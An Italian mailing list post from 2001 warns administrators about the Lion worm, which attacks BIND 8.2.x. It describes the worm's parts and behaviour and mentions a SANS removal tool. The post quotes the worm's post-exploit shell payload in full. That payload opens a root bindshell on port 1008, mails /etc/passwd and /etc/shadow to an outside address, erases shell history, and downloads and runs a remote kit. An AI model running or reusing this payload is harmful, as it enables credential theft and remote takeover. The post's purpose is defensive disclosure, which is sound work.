[Tech] Nuovo worm
Egyeki Gergely
egeri@inf.elte.hu
Lun 26 Mar 2001 12:44:40 CEST
Ciao!
C'e' un nuovo worm, e si chiama lion ( 1i0n.sh ) e assomiglia molto a
Ramen, il quale e' stato il precedente.
www.sans.org/y2k/lion.htm
In questo sito potete trovare un utiliy : lionfind per eliminare lion
sui vostri sistemi.
Ma qualche giorni fa Neil Long ha segnalato a Securityfocus, che il loro
analizi SANS GIAC del lion non e' corretto.
Non si tratta sul t0rn kit e non segnalano la porta 1008.
E il loro utiliti non trova i varianti. ?!
Gia' ci sono varianti...
il worm :
contiene:
- e' un variante di t0rnkit
- pscan
- randb ( rende ip randomizzati per pscan )
- scrip tti di shell
- precompilati exploiti di bind
- utiliti per la cacellazione dei segni
scopi:
- bind 8.2 , 8.2.1 , 8.2.2 , 8.2.2-PX
attaca dopo il rapporto pozitivo di pscan:
- bindshell sulla porta 1008
- manda in e-mail etc/shadow, etc/passwd + informazioni delle interfacce
- download del KIT ( lynx -dump)
- untar , init
init script:
- rm /etc/host.deny
- si mette dentro in rc.sysinit, per farsi funzionare al riavvio
( Red Hat , SUSE ? )
- avvia
Probabilmente si fonde sul TSIG exploit.
Dopo l'exploit il packetto di TCP contiene:
PATH='/usr/bin:/bin:/usr/loacal/bin:/usr/sbin:/sbin';export PATH; export
TERM=vt100; rm -rf /dev/.lib; mkdir /dev.lib; cd /dev/.lib; echo '1008
stream tcp nowait root /bin/sh sh'>> /etc/inetd.conf; killall -HUP inetd;
ifconfig -a >1i0n; cat /etc/passwd>>1i0n; cat /etc/shadow >>1i0n; mail
1i0nip@china.com <1i0n; rm -fr 1i0n; rm -rf .bash_history; lynx -dump
http://collion.51.net/crew.tgz> 1i0n.tgz; tar -zxvf 1ion.tgz; rm -rf
1i0n.tgz; cd lib, ./1i0n.sh; exit
Ciao
Geri
Maggiori informazioni sulla lista
flug-tech